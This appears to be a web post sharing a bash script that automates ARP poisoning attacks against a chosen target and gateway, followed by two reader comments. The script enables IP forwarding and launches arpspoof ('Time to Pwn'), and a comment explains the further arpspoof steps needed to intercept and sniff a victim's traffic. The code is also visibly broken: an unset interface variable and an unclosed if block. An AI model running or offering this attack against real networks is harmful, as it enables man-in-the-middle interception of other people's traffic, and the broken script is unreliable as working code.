The purpose of this script is to automate the process of ARP poison attacks.The attacker must only insert the IP address of the target and the IP of the Gateway.This script was coded by Travis Phillips and you can find the source code below:

if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
echo -e "\n33[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " 33[1;31mCoded By:33[0m Travis Phillips"
echo -e " 33[1;31mDate Released:33[0m 03/27/2012"
echo -e " 33[1;31mWebsite:33[0m\n33[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &

ARP poison script
ARP poison script


  1. Just using arpspoof is enought : arpspoof [-i interface] -t targetIP gatewayIP
    This script is a bit useless

  2. This is not a useless script at all. Despite the fact that this script will not perform the function it is advertised to, it is an excellent start and serves as a beautiful example for somebody who can connect the dots to finish this.

    The first command, used for ip forwarding, is both essential and correct.

    The script needs the following functions added to successfully ARP poison a target in a manner that would then leave them susceptible to a packet sniffing attack later on – in a third party software, like Wireshark, whereby protocols can be filtered and TCP streams may be traced…

    1. arpspoof [-i interface] -t
    2. arpspoof [-i interface] -t

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